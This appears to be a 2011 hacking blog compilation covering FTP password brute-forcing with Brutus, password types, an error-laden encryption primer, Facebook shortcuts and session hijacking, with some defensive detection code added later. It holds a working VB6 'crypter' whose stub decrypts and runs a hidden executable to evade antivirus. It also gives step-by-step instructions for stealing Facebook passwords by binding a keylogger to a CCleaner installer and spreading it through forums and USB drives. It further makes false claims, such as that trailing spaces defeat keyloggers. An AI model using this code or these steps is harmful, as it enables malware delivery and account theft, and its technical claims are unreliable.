Monday, February 21, 2011

FTP

FTP is an application, service or protocol that can be used to transfer files from one place to another; it comes in very handy when transferring files from a local box to a remote one. If someone gets access to your FTP service, he or she can cause a nightmare for you by uploading inappropriate images or files. Here we will discuss how the password of an IIS-installed FTP service in Windows can be cracked.

What is Brute-Force?

Brute-force is a type of attack in which every possible combination of letters, digits and special characters is tried until the right password is matched with the username. The main limitation of this attack is its time factor. The time it takes to find the proper match mainly depends on the length and complexity of the password. Here I will be using this attack to crack the password. So, let's start.

Requirements:
  1. The tool we will be using: "BrutusA2" (Download: http://www.hoobie.net/brutus/)
  2. You need to know the target, for example "ftp://123.123.xx.xxx"

Procedure:

Step 1. Here I have shown an authentication page of an FTP service in the image below, and in the following steps we will crack its password using Brutus.

Step 2. Now open up "Brutus", type your desired target, select a wordlist, select "FTP" from the drop-down menu and click Start. If you are confused, follow the image below.

Step 3. As I mentioned above, the time it takes depends on the complexity and length of the password. So after clicking the Start button, wait for the time indicated in the tool. The password will be displayed as shown above.

Recommendation: I would recommend that readers try it in a virtual environment, as I did, and enjoy the trick. It is not advisable to try it on some unknown user without prior permission.
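Seen from the server side, the procedure above is a burst of failed logins from a single client, and it stands out in the FTP service log. The following is an added example, not part of the original post: it flags any client that fails `PASS` several times inside a short window and reports whether a success followed. The log lines are constructed, the field names are assumed to follow the W3C extended layout that IIS FTP writes, and the threshold and window are illustrative values.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample log; all addresses come from documentation ranges.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem sc-status sc-win32-status
2011-02-21 10:00:01 203.0.113.7 - 192.0.2.10 21 USER administrator 331 0
2011-02-21 10:00:01 203.0.113.7 - 192.0.2.10 21 PASS *** 530 1326
2011-02-21 10:00:03 203.0.113.7 - 192.0.2.10 21 USER administrator 331 0
2011-02-21 10:00:03 203.0.113.7 - 192.0.2.10 21 PASS *** 530 1326
2011-02-21 10:00:05 203.0.113.7 - 192.0.2.10 21 USER administrator 331 0
2011-02-21 10:00:05 203.0.113.7 - 192.0.2.10 21 PASS *** 530 1326
2011-02-21 10:00:07 203.0.113.7 - 192.0.2.10 21 USER administrator 331 0
2011-02-21 10:00:07 203.0.113.7 - 192.0.2.10 21 PASS *** 530 1326
2011-02-21 10:00:09 203.0.113.7 - 192.0.2.10 21 USER administrator 331 0
2011-02-21 10:00:09 203.0.113.7 - 192.0.2.10 21 PASS *** 530 1326
2011-02-21 10:00:11 203.0.113.7 - 192.0.2.10 21 USER administrator 331 0
2011-02-21 10:00:11 203.0.113.7 - 192.0.2.10 21 PASS *** 530 1326
2011-02-21 10:00:13 203.0.113.7 - 192.0.2.10 21 USER administrator 331 0
2011-02-21 10:00:13 203.0.113.7 administrator 192.0.2.10 21 PASS *** 230 0
2011-02-21 10:05:00 198.51.100.20 - 192.0.2.10 21 USER alice 331 0
2011-02-21 10:05:00 198.51.100.20 - 192.0.2.10 21 PASS *** 530 1326
2011-02-21 10:05:20 198.51.100.20 - 192.0.2.10 21 USER alice 331 0
2011-02-21 10:05:20 198.51.100.20 alice 192.0.2.10 21 PASS *** 230 0
"""


def parse_w3c(text):
    """Yield one dict per log row, keyed by the names in the #Fields header."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            parts = line.split()
            if len(parts) != len(fields):
                continue  # skip malformed rows rather than guess at them
            row = dict(zip(fields, parts))
            row["ts"] = datetime.strptime(
                row["date"] + " " + row["time"], "%Y-%m-%d %H:%M:%S")
            yield row


def detect_bruteforce(rows, threshold=5, window=timedelta(seconds=60)):
    """Return {client_ip: details} for clients with >= threshold failed PASS in window."""
    recent = defaultdict(deque)   # client -> timestamps of failures inside the window
    tried = defaultdict(set)      # client -> usernames it failed against
    last_user = {}                # client -> name sent in its latest USER command
    alerts = {}
    for row in rows:
        ip, method = row["c-ip"], row["cs-method"].upper()
        if method == "USER":
            last_user[ip] = row["cs-uri-stem"]
        elif method == "PASS" and row["sc-status"] == "530":
            failures = recent[ip]
            failures.append(row["ts"])
            while row["ts"] - failures[0] > window:
                failures.popleft()
            tried[ip].add(last_user.get(ip, "?"))
            if len(failures) >= threshold:
                alerts.setdefault(ip, {"usernames": tried[ip], "success_as": None})
        elif method == "PASS" and row["sc-status"] == "230" and ip in alerts:
            # A login that succeeds after the burst means the guessing worked.
            alerts[ip]["success_as"] = last_user.get(ip, "?")
    return alerts


if __name__ == "__main__":
    for ip, info in detect_bruteforce(parse_w3c(SAMPLE_LOG)).items():
        print(ip, sorted(info["usernames"]), "success as:", info["success_as"])
```

A single mistyped password followed by a correct one, as in the second client of the sample, stays below the threshold and raises nothing.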
Passwords can be categorized into various types based on their composition. Let us take a look at these types to enhance our understanding of password cracking.

• Passwords that contain only letters: As rightly inferred, these contain just letters of the alphabet and are the easiest to crack. Example: "secret"
• Passwords that contain only numbers: These passwords consist purely of numerals. Example: "12354"
• Passwords that contain only special characters: These passwords consist of only special characters. The shorter they are, the easier they are to crack. Example: "*%$%@"
• Passwords that contain letters and numbers: These passwords were the first step towards secure passwords. They are relatively harder to crack than passwords with just letters or numerals. Example: "a3rf5"
• Passwords that contain only letters and special characters, and passwords that contain only special characters and numbers, are quite similar to the preceding one. Examples: "df%g$i", "39*&4"
• Passwords that contain letters, special characters and numbers are considered to be the most secure, as the combination can be difficult to crack. Given an appropriate length, they can be considered to be safe and, if encrypted well, safe on the network as well. Example: "a#d5y8%"


************************************************************************


NOTE: Well friends, it is documented nowhere that the most secure password contains [SPACES]. Using spaces in your password, it will become the strongest. Using spaces, you can easily bypass trojans and keyloggers (almost 100%). I recommend using 3-4 spaces as a prefix of your password. For example, suppose your password is "iamsweet123" (without quotes).

Instead of this password, use "iamsweet123   ". Now what is the difference? Have a closer look. In the latter one you will see that it is exactly "iamsweet123[space][space][space]".

This is an article about some common forms of encryption, with some examples of what they look like.

Cryptography-
Cryptography is often associated with encryption, or hiding information from others except the desired party. This usually involves having a certain knowledge of the encryption, also known as a key. This has been used for centuries by militaries and governments to hide and transfer data. For example, in ancient days, one king would shave a subject's head, then tattoo the message on the subject's head. This way the subject did not know what the message was either. Then, after his hair grew back, he would be sent to the other king and his head would be shaved; then, when the king had the message, the subject was killed and the message was disposed of. So, step by step, this is the general way an encryption works. First, find a viable way to hide the message. Second, find a safe way to transport the message. Third, decrypt the message. Inside each step there is a good amount of detail.

Encrypting the message-
There are many common ways to encrypt data, for instance a shift cipher. In a shift cipher you shift each letter a certain number of letters in the alphabet. EXAMPLE: In a cipher with a key of one, you would shift each letter one letter along in the alphabet. So A would become B, and a word like HIDDEN would become IJEEFO, thus rendering the message illegible. The reason you would not want to use a simple shift cipher is how easy it is to "crack" the encryption. "Cracking" an encryption is basically brute forcing the key, or gaining the key through other means such as Trojans, social engineering or one of the many other ways. As for our shift cipher, also known as a "Caesar cipher" if it is a shift of three or as ROT-13 if it is a 13-letter shift, it would be very easy to just decrypt the message by hand or to write a simple program that can decrypt the message in mere moments.

The Difference Between Hashing And Encrypting-
Encryption is a scheme where a plaintext is made into ciphertext using a secure key. The security of the cipher resides in the key length, and the decryption process is difficult without proper knowledge of the key.

As for hashing, the best way to describe a hash is as a one-way function that compresses arbitrary-length strings into fixed short strings. Hashes can be designed using block ciphers, with a secret key as a parameter along with the message that has to be hashed, or without them (dedicated hash functions such as MD4, MD5, SHA-1 etc.).

Here I will describe a few common hashes, along with why they are not secure, and some examples of what they look like.

MD5 (Message-Digest algorithm 5)-
MD5 was created in 1991 in order to replace the less secure MD4. Although a serious flaw was found in this form of encryption, it is still widely used. Cryptographers suggest the use of more secure algorithms such as SHA-1 or Whirlpool. MD5 is a 128-bit hash, which makes it rather small and thus makes it vulnerable to the birthday attack (which I will include at the end). The algorithm for MD5 is also open source, which makes this form of encryption rather easy to break. Not only that, but MD5 hashes are also vulnerable to man-in-the-middle attacks, which can gain the first three characters, enabling easier brute forcing of the hash.

Here are some examples of An MD5 hash:
Hidden: 662f707d5491e9bce8238a6c0be92190
Hellboundhackers: 07113826bfa7f58ef0ccf537ab9b5d0e

And here is the pseudocode for it:

Source: Wikipedia
//Note: All variables are unsigned 32 bits and wrap modulo 2^32 when calculating
//leftrotate(x, c) := (x << c) or (x >> (32 - c))
var int[64] r, k

//r specifies the per-round shift amounts
r[ 0..15] := {7, 12, 17, 22, 7, 12, 17, 22, 7, 12, 17, 22, 7, 12, 17, 22}
r[16..31] := {5, 9, 14, 20, 5, 9, 14, 20, 5, 9, 14, 20, 5, 9, 14, 20}
r[32..47] := {4, 11, 16, 23, 4, 11, 16, 23, 4, 11, 16, 23, 4, 11, 16, 23}
r[48..63] := {6, 10, 15, 21, 6, 10, 15, 21, 6, 10, 15, 21, 6, 10, 15, 21}

//Use binary integer part of the sines of integers (radians) as constants:
for i from 0 to 63
    k[i] := floor(abs(sin(i + 1)) × (2 pow 32))

//Initialize variables (the byte sequence 01 23 45 67 ... read as little-endian words):
var int h0 := 0x67452301
var int h1 := 0xEFCDAB89
var int h2 := 0x98BADCFE
var int h3 := 0x10325476

//Pre-processing:
append "1" bit to message
append "0" bits until message length in bits ≡ 448 (mod 512)
append bit /* bit, not byte */ length of unpadded message as 64-bit little-endian integer to message

//Process the message in successive 512-bit chunks:
for each 512-bit chunk of message
    break chunk into sixteen 32-bit little-endian words w[i], 0 ≤ i ≤ 15

    //Initialize hash value for this chunk:
    var int a := h0
    var int b := h1
    var int c := h2
    var int d := h3

    //Main loop:
    for i from 0 to 63
        if 0 ≤ i ≤ 15 then
            f := (b and c) or ((not b) and d)
            g := i
        else if 16 ≤ i ≤ 31
            f := (d and b) or ((not d) and c)
            g := (5×i + 1) mod 16
        else if 32 ≤ i ≤ 47
            f := b xor c xor d
            g := (3×i + 5) mod 16
        else if 48 ≤ i ≤ 63
            f := c xor (b or (not d))
            g := (7×i) mod 16

        temp := d
        d := c
        c := b
        b := b + leftrotate((a + f + k[i] + w[g]) , r[i])
        a := temp

    //Add this chunk's hash to result so far:
    h0 := h0 + a
    h1 := h1 + b
    h2 := h2 + c
    h3 := h3 + d

var int digest := h0 append h1 append h2 append h3 //(expressed as little-endian)

SHA-1 -
SHA stands for Secure Hash Algorithm. This algorithm produces a 160-bit hash. SHA-1 is only one of the many SHA-* styles, but it is the most common and most secure. Some other SHA styles are SHA-224, SHA-256, SHA-384 and SHA-512. These make a hash that is the number of bits in their name. For example, SHA-224 is a 224-bit hash. The reason that this form of encryption is insecure is that a modified version of a collision attack can be performed, and through this method you can get up to a quarter of the hash into plaintext, thus making it cracked in principle.

Here are some examples of SHA hashes:

Hidden- 7acdf85c69cc3c5305456a293524386e
Hellboundhackers- 07113826bfa7f58ef0ccf537ab9b5d0e

SHA-2 and the others have no attacks reported, but SHA-1 has an attack based on a mathematical system that allows it to be cracked. Even though the others have no reported attacks, SHA-3 is in the making. This one will be the standard SHA in 2012, after the competition is over. This competition takes place from 2008-2011.

Common Encryption:

Binary-
Binary is a base-2 "language" used in computing to specify either on (1) or off (0). This was commonly used to hide plaintext from most people. Binary uses an 8-bit-per-character format that is very easily noticed by almost anyone, considering that it consists solely of 0's and 1's. It can be easily broken with a copy of any ASCII chart or a very easily written program. One other reason that it is not used, besides its insecurity, is how much space it takes to store a binary encryption and how long it takes to encrypt things into binary. Think of it this way: for every one character of plaintext, there are 8 in binary. This means a relatively large file will not only take a long time to encrypt, it will also be a massive file to transfer.

DES -

DES is based on a symmetric key algorithm that has a 56-bit key. The chief reason that this form of encryption is so insecure is the rather small size of the key. There are public programs that can break a DES encryption in 22 hours and 15 minutes. These have made the US, along with many other countries, turn to more secure means of encryption.

Examples:

Hidden: CREAE8aHr13jY
Hellboundhackers: CRNg1HW8ckWJk

Base 64-
Base 64 uses 64 printable ASCII characters to encrypt data. The characters are A-Z, a-z and 0-9; the other two vary from OS to OS. Sometimes this also includes a suffix of an = character. Base 64 is often very easily identified and can easily be deciphered with an easily accessible algorithm to decrypt it.

Hidden: SGlkZGVuIA==
Hellboundhackers: SGVsbGJvdW5kaGFja2Vycw==

And there are many many others.

Creating your own:

So you think you may want to create a more secure encryption method? Well, you're in for a surprise at how challenging it really is. First you have to come up with your encryption style, whether it be algorithm based or something else. Then you must decide on how to transfer the key. This must also be secure. Then there is decrypting the cipher.
One problem you will face is what is a secure algorithm and what is not. A more advanced algorithm does not mean a more secure encryption. Another problem is how fast the program can run the algorithm. An advanced algorithm may be secure, but if it takes three days to decrypt with the key, is it worth using? And then with the key, there are a few ways to transfer it safely. One way is like the spy movie: a guy with a briefcase handcuffed to his wrist. A more feasible way would be to meet the person and exchange it. Or you could just use a more common encryption method and send it to them in e-mail. One last, slow way would be to mail them the key. Either way, you must decide how you will keep it secure on the way.

Some common attacks on cryptography:

DoS-
DoS (Denial of Service) attacks are when someone tries to make a service or action unusable. One very unlikely, but possible, method would be cutting the victim's internet cable. This renders them incapable of accessing the said source. Although this attack is usually used on a web server, it can also be used to stop an encryption from ever reaching its intended party. Another way this attack could be carried out would be to send a server a massive number of requests, keeping the server busy.

Man In The Middle (MITM)-
MITM is where the attacker makes a connection with the host then passes the message to the other host, making them believe that they are talking directly to each other over a private connection although the conversation is controlled solely by the attacker. The attacker then would intercept messages and send new ones.

Birthday Attack-
In this attack you use mathematics to exploit collisions. This is a rather formidable attack because of how efficient it is, especially if the function holds a lot of matches in the pseudorandom lookup of matches in collisions.
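The efficiency of the birthday attack can be measured directly on a hash with a short output. The following is an added example, not part of the original article: it truncates SHA-256 to a chosen number of bits (a stand-in for a small hash, chosen here only for illustration), hashes distinct messages until two digests match, and compares the work with the square-root estimate. The function names are illustrative.

```python
import hashlib
import math


def small_hash(data: bytes, bits: int) -> int:
    """Top `bits` bits of SHA-256, standing in for a hash with a short output."""
    full = int.from_bytes(hashlib.sha256(data).digest(), "big")
    return full >> (256 - bits)


def find_collision(bits: int):
    """Hash distinct messages until two share a digest.

    Returns both messages and the number of messages hashed.
    """
    seen = {}          # digest -> first message that produced it
    count = 0
    while True:
        msg = b"message-%d" % count
        count += 1
        tag = small_hash(msg, bits)
        if tag in seen:
            return seen[tag], msg, count
        seen[tag] = msg


def expected_work(bits: int) -> float:
    """Messages needed for a 50% chance of a collision: sqrt(2 ln 2 * 2^bits)."""
    return math.sqrt(2 * math.log(2) * 2.0 ** bits)


if __name__ == "__main__":
    for bits in (16, 24, 32):
        a, b, n = find_collision(bits)
        print(f"{bits}-bit digest: {a!r} and {b!r} collide after {n} hashes "
              f"(birthday estimate {expected_work(bits):.0f}, "
              f"exhaustive search {2 ** bits})")
    # For a 128-bit digest such as MD5 the same estimate is about 2^64, not 2^128.
    print(f"128-bit digest: about 2^{math.log2(expected_work(128)):.1f} hashes")
```

The work grows with the square root of the number of possible digests, which is why doubling the digest length is needed to double the collision resistance in bits.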

Cryptanalysis-
Cryptanalysis is also known as code breaking or cracking a code. Although this does not necessarily imply encryption, it is one major part of cracking. This form usually excludes attacks such as the ones mentioned above, social engineering, burglary or keylogging. In the past, one way to crack an encryption was to use frequency analysis, or seeing what type of characters appear most. For instance, the letter "E" is the most common in English, and the digraph "TH" is the most common. In practice it relies on as much linguistic knowledge as it does statistics. As encryption got more and more detailed, mathematics became more of a major player in cracking. In modern times the advanced computations in an encryption have made cryptanalysis less of a key player than in the past, when pen-and-paper encryptions were used.
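The shift cipher described earlier and the frequency analysis described here meet in a few lines of code. The following is an added example, not part of the original article: it tries all 26 keys and keeps the candidate whose letter counts are closest to English, using a chi-squared score. The frequency table holds approximate published values for English text, and the function names are illustrative.

```python
# Approximate relative frequency of each letter in English text, in percent.
ENGLISH_FREQ = {
    "A": 8.167, "B": 1.492, "C": 2.782, "D": 4.253, "E": 12.702, "F": 2.228,
    "G": 2.015, "H": 6.094, "I": 6.966, "J": 0.153, "K": 0.772, "L": 4.025,
    "M": 2.406, "N": 6.749, "O": 7.507, "P": 1.929, "Q": 0.095, "R": 5.987,
    "S": 6.327, "T": 9.056, "U": 2.758, "V": 0.978, "W": 2.360, "X": 0.150,
    "Y": 1.974, "Z": 0.074,
}


def shift(text: str, key: int) -> str:
    """Shift every ASCII letter by `key` places; leave everything else alone."""
    out = []
    for ch in text:
        if ch.isascii() and ch.isalpha():
            base = ord("A") if ch.isupper() else ord("a")
            out.append(chr((ord(ch) - base + key) % 26 + base))
        else:
            out.append(ch)
    return "".join(out)


def chi_squared(text: str) -> float:
    """Distance between the letter counts of `text` and English; lower is closer."""
    letters = [c for c in text.upper() if c in ENGLISH_FREQ]
    if not letters:
        return float("inf")
    total = len(letters)
    score = 0.0
    for letter, percent in ENGLISH_FREQ.items():
        expected = total * percent / 100
        observed = letters.count(letter)
        score += (observed - expected) ** 2 / expected
    return score


def crack_shift(ciphertext: str):
    """Try every key and return (key, plaintext) for the most English-like result."""
    scored = [(chi_squared(shift(ciphertext, -key)), key) for key in range(26)]
    _, best_key = min(scored)
    return best_key, shift(ciphertext, -best_key)


if __name__ == "__main__":
    secret = shift("Breaking a cipher simply means finding a weakness in the cipher "
                   "that can be exploited with a complexity less than brute force", 13)
    print(secret)
    print(crack_shift(secret))
```

The statistics need material to work on: a six-letter ciphertext such as the HIDDEN example is too short to score reliably, and there the 26 candidates are simply read by eye.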
So in order to sum this up, I will use this quote.
"Breaking a cipher simply means finding a weakness in the cipher that can be exploited with a complexity less than brute force. Never mind that brute-force might require 2^128 encryptions; an attack requiring 2^110 encryptions would be considered a break...simply put, a break can just be a certificational weakness: evidence that the cipher does not perform as advertised." (Schneier, 2000).
Facebook has keyboard shortcuts to make your navigation easier. It is an automatic feature which is already enabled. You can now use shortcuts to quickly jump from the Facebook home page to any page.

List of Facebook Keyboard Shortcuts
• Alt + 1 Return to FB Homepage
• Alt + 2 To go to the Wall tab of your Profile page
• Alt + 3 To view the Friend Requests drop-down list
• Alt + 4 To view the latest Messages in a drop-down list
• Alt + 5 To view the Notifications drop-down list
• Alt + 6 To go to the Account settings webpage
• Alt + 7 To go to the Account privacy configuration webpage
• Alt + 8 To open the Facebook fan page at facebook.com/facebook
• Alt + 9 To open Facebook's Statement of Rights & Responsibilities
• Alt + 0 To open the Facebook Help Center
• Alt + m To create a New Message
• Alt + ? For cursor control in the Search Box

The above shortcuts work with Chrome and IE. Firefox users can use the Shift key along with the above key combinations, for example Shift+Alt+1. Also note that there is no need to type the + sign while using shortcut keys.

How To Make a crypter ?
What you will need:
Visual Basic 6 or Visual Basic 6 Portable
A RC4 module
A brain


The RC4 module and Visual Basic 6 Portable will have the download links at the end of this tutorial.

TABLE OF CONTENTS:
1. Introduction
2. Building your crypter
3. Conclusion

1. Introduction

RC4:
In cryptography, RC4 (also known as ARCFOUR or ARC4 meaning Alleged RC4, see below) is the most widely used stream cipher and is used in protocols such as Secure Sockets Layer (SSL) (to protect Internet traffic) and WEP (to secure wireless networks).

Stub:
A method stub or simply stub in software development is a piece of code used to stand in for some other programming functionality. A stub may simulate the behavior of existing code (such as a procedure on a remote machine) or be a temporary substitute for yet-to-be-developed code. Stubs are therefore most useful in porting, distributed computing as well as general software development and testing.

Builder:
A builder is usually the client that makes or does something to a file, and it is supposed to go with a stub. The builder usually allows the stub to simulate the behavior of existing code, and then it makes the file or does something to a file.

2. Building your crypter.

Now, open up Visual Basic 6 or Visual Basic Portable. To make the task easier, open two Visual Basic 6 programs. One is going to be the builder, and one is going to be the stub.

Now, let's start on the builder. Add an RC4 module, and let's go on. First of all, add one label that says "File Path:", a text box right beside "File Path:", a button that says "Browse" or "...", and another button that says "Crypt" or "Build". Now, let's add the CommonDialog control. Add a CommonDialog and name it commondlg. Now, double click the button that says "Browse" or "...". Add this code, and I'll explain it.


Code:
With commondlg 'CommonDialog1.
     .Filter = "Executable files | *.exe" 'The file used for crypting. (*.exe)
     .DialogTitle = "Please select a executable file..." 'The title of the dialog.
     .ShowOpen 'Show the dialog.
     End With
     TextBox1.Text = commondlg.FileName 'Make TextBox1.Text as the selected filename.

The With commondlg command calls CommonDialog1.
The .Filter part allows you to choose what files you only want to be selected.
The .DialogTitle command is the title of the dialog (the prompt that tells you which file you want to select for crypting).
The .ShowOpen command shows the dialog.
End With will end CommonDialog1.
And finally, the TextBox1.Text = commondlg.FileName command makes TextBox1.text show the selected filename.

Now, click the button that says "Build" or "Crypt". Add this code. It explains it, so please take time to read what it says.
Code:
Dim sStub As String, sFile As String 'Declare the two string buffers.
Open App.Path & "\stub.exe" For Binary As #1 'Open the stub.
sStub = Space(LOF(1)) 'Size the buffer to the length of the open file.
Get #1, , sStub 'Read the whole file into the buffer.
Close #1 'Close the file.

Open TextBox1.Text For Binary As #1 'Open the file selected in the text box.
sFile = Space(LOF(1)) 'Size the buffer to the length of the open file.
Get #1, , sFile 'Read the whole file into the buffer.
Close #1 'Close the file.

Open App.Path & "\output.exe" For Binary As #1 'Create the output file "output.exe".
Put #1, , sStub & FileSplit & RC4(sFile, Pass) 'Write the stub, the FileSplit marker and the RC4-encrypted file.
Close #1 'Close the file.

MsgBox ("File crypted successfully!") 'Show a message once the output file has been written.

Now, you might get an error telling you that FileSplit and Pass are not declared. To fix this, we will add the declarations at the top of the code.

Code:
Const FileSplit = "<@#@>" 'The file split.
Const Pass = "s0rasRC4Tutorial" 'The RC4 password.

For this tutorial, we will be using "s0rasRC4Tutorial" as the RC4 password.

Now, lets start on the stub. Add the RC4 module, and make a new module called modMain. Add this code in modMain:
Code:
Const FileSplit = "<@#@>" 'The file split.
Const Pass = "s0rasRC4Tutorial" 'The RC4 password; It must be the same as the one on the builder!

Public Declare Function ShellExecute Lib "Shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpszOp As String, ByVal lpszFile As String, ByVal lpszParams As String, ByVal LpszDir As String, ByVal FsShowCmd As Long) As Long 'Declares the ShellExecute API function.

Public Sub Main() 'The main part of the stub.
Dim sStub As String, sFile As String 'Declare the string buffers again, just like we did on the builder.
Open App.Path & "\" & App.EXEName & ".exe" For Binary As #1 'Open the running executable itself.
sStub = Space(LOF(1)) 'Size the buffer to the length of the open file.
Get #1, , sStub 'Read the whole file into the buffer.
Close #1 'Close the file.

sFile = Split(sStub, FileSplit)(1) 'Take the part after the FileSplit marker.
Open Environ("tmp") & "\decrypted.exe" For Binary As #1 'Create "decrypted.exe" in the temporary files folder.
Put #1, , RC4(sFile, Pass) 'Write the data, passed through RC4 with the same password, to that file.

Call ShellExecute(0, vbNullString, Environ("tmp") & "\decrypted.exe", vbNullString, vbNullString, 1) 'Call ShellExecute on the file in the temporary files folder.

End Sub 'This ends "Public Sub Main()".

The code will be teaching you. Once you're done, remove the Form1.

3. Conclusion
I hope you liked this tutorial, and I hope you learned a lot about crypting with RC4!

Visual Basic 6 Portable: http://www.mediafire.com/?tgicg4hn1n5
RC4 module: http://www.freevbcode.com/ShowCode.asp?ID=4398
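A file produced by the builder above has a recognisable shape: a complete stub executable, then the FileSplit marker, then encrypted data, all sitting past the end of the last PE section. The following is an added example, not part of the original tutorial: a static check that measures that trailing data (the overlay), looks for the marker and computes the entropy of what follows it. The sample file is a constructed, non-functional PE image, the marker is assumed to be stored as ASCII bytes, and the function names are illustrative.

```python
import hashlib
import math
import struct
from collections import Counter

MARKER = b"<@#@>"  # FileSplit constant from the tutorial, assumed stored as ASCII


def overlay_offset(data: bytes) -> int:
    """Return the file offset at which the last section's raw data ends."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    (n_sections,) = struct.unpack_from("<H", data, e_lfanew + 6)
    (opt_size,) = struct.unpack_from("<H", data, e_lfanew + 20)
    table = e_lfanew + 24 + opt_size          # section table follows the optional header
    end = table + 40 * n_sections
    if end > len(data):
        raise ValueError("truncated section table")
    for i in range(n_sections):
        # SizeOfRawData and PointerToRawData sit at offsets 16 and 20 of each entry.
        raw_size, raw_ptr = struct.unpack_from("<II", data, table + 40 * i + 16)
        if raw_size:
            end = max(end, raw_ptr + raw_size)
    return min(end, len(data))


def shannon_entropy(buf: bytes) -> float:
    """Entropy in bits per byte: 0.0 for constant data, close to 8.0 for ciphertext."""
    if not buf:
        return 0.0
    n = len(buf)
    return -sum(c / n * math.log2(c / n) for c in Counter(buf).values())


def inspect_overlay(data: bytes) -> dict:
    """Summarise what lies after the last section of a PE file."""
    overlay = data[overlay_offset(data):]
    pos = overlay.find(MARKER)
    payload = overlay[pos + len(MARKER):] if pos >= 0 else overlay
    return {
        "overlay_size": len(overlay),
        "marker_at": pos,                      # -1 when the marker is absent
        "payload_entropy": round(shannon_entropy(payload), 2),
    }


def build_sample_pe() -> bytes:
    """Constructed, non-functional PE image: headers plus one 0x200-byte section."""
    dos = b"MZ" + bytes(0x3A) + struct.pack("<I", 0x40)
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0xE0, 0x0102)
    optional = struct.pack("<H", 0x10B) + bytes(0xE0 - 2)
    section = struct.pack("<8sIIIIIIHHI", b".text", 0x200, 0x1000,
                          0x200, 0x200, 0, 0, 0, 0, 0x60000020)
    headers = dos + b"PE\0\0" + coff + optional + section
    return headers.ljust(0x200, b"\0") + b"\xCC" * 0x200


def constructed_ciphertext(n: int) -> bytes:
    """Constructed stand-in for encrypted data: SHA-256 of a running counter."""
    blocks = (hashlib.sha256(i.to_bytes(4, "big")).digest() for i in range((n + 31) // 32))
    return b"".join(blocks)[:n]


if __name__ == "__main__":
    clean = build_sample_pe()
    print("clean :", inspect_overlay(clean))
    print("packed:", inspect_overlay(clean + MARKER + constructed_ciphertext(4096)))
```

An overlay is not suspicious by itself, since installers and signed files carry one too; the combination of a large overlay and entropy close to 8 bits per byte is what makes a file worth a closer look.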
.............................................................................................................................................
Hello friends, today I will explain how to hack a Facebook password or account remotely using a keylogger. It's a 100% working hack and you can easily hack anyone's Facebook account or password using it. In this tutorial I will explain how to hack Facebook and other passwords of any user using a 100% FUD keylogger. The keylogger we will discuss in this tutorial is L33ts keylogger, and it's 100% FUD (fully undetectable).

Hacking a Facebook account is very easy and requires no more than 10 minutes of work. Don't worry, I will also tell you how to protect your Facebook account or passwords from such hacks and hackers. But for this you must know how hackers hack your Facebook account. So first I will teach you how to hack a Facebook account remotely, and then I will tell you how to protect yourself from this.

NOTE: This tutorial is for educational purposes only, i.e. to make you aware of how hackers hack your Facebook accounts. Please don't misuse it. I and FB are not responsible for any damage caused by you.

 So guys lets start hacking Facebook account or passwords....
Steps to hack Facebook account using Keylogger:
1. Creating the Keylogger Server to hack Facebook passwords.
2. Extracting the Icon from installer.
3. Bind the keylogger server with any software setup.
4. How to spread your keylogger or send it to your friends to hack their Facebook accounts or passwords.


Step 1. Creating the Keylogger Server
1. Download the keylogger.
2. Extract the file, Now you will get two folders:
a. First one contains Keylogger and Binder
b. Second Contains resource hacker tool.( to extract the icons from installers).

3. Now open the Keylogger. It contains two files one for gmail email and other for password. For this create one test account on Gmail and enter it's details in this.


4. After entering email and password. Set the time interval usually set 3 mins i.e. after how much time you want to receive logs from the user.
5. Now click on send verification mail. This mail is to test that your keylogger is working correctly or not.
6. After you click this you will receive a confirmation mail on test account which will confirm that keylogger is working.
7. Now click on generate to set the mutex (any secret key to make your keylogger FUD) and then click on compile server.
8. Now save the file to desktop or any other location of your choice. Now your server is ready but it can be easily detected.


Step 2.: Extracting the Icon file from any installer(resource hacker)
1. Open the Resource hacker folder and open the reshacker file.
2. Now go to its menu and open any setup file. Suppose we want to attach our keylogger to Ccleaner setup file. So open the Ccleaner setup with resource hacker. 
3. Now in menu there is one action button click on it and then click save all resources.



4. Now save all the resources to desktop or any other location of your choice.
5. It consists of two files one is icon file and other is res file . We only need icon file, so you can delete the other file i.e res file.
6. Now we have Icon of installer file(as discussed above Ccleaner setup Icon).


Step 3: Bind the Keylogger server with any software
1. Now Go to keylogger folder and open the Binder.
2. Now Click on + button given below to add files.
3. Now add the keylogger server and the set up of software (i.e. in our case it's Ccleaner setup).
4. Now in menu of Binder, Go to Settings. There select the icon that we have generated in the previous step and set the location of output file as shown in figure.



5. Now again go to File's menu in Binder and click on Bind files.
6. Now your Binded keylogger is ready. Now you have to spread it or send it to the victim that is your friend.


Step4 : How to Spread Keylogger or send it to victim or friend
1. Now you have one software setup file with the keylogger attached to it. (In our case we have the Ccleaner setup with the keylogger attached to it.)
2. Now Spread your keylogger through forums. You might be a member of various forums use them to spread your keylogger in form of software posts. You can use various software's to spread them that users frequently download.
3. Spread it through pendrives or USB hard drives. Suppose a friend asked you for a software give it the software that has keylogger attached with it. 
Note: you can also attach keylogger with images also. But that can be detectable by antivirus. So avoid such type of hacking.
So isn't that so easy to hack anyone's Facebook account in just few minutes. 

How to protect yourself from these hacks?
Prevention is always better than cure so always follow these steps:
1. Don't use cracked software and don't download it from unauthorized websites.
2. Always keep your antivirus and anti-spyware up to date.
3. Always scan the files before transferring them to your USB.
4. Do not allow other users to use your PC i.e password protect it.
There are two types of hijacking attacks:
  1. Active: In an active attack, an attacker finds an active session and takes over.
  2. Passive: With a passive attack, an attacker hijacks a session, but sits back and watches and records all of the traffic that is being sent forth.
Session hijacking can be active or passive in nature, depending on the degree of involvement of the attacker in the attack. The essential difference between an active and a passive hijack is that while an active hijack takes over an existing session, a passive attack monitors an ongoing session.
Generally a passive attack uses sniffers on the network, allowing the attacker to obtain information such as user ID and password so that he can use it later to log on as that user and claim his privileges. Password sniffing is only the simplest attack that can be performed when raw access to a network is obtained.
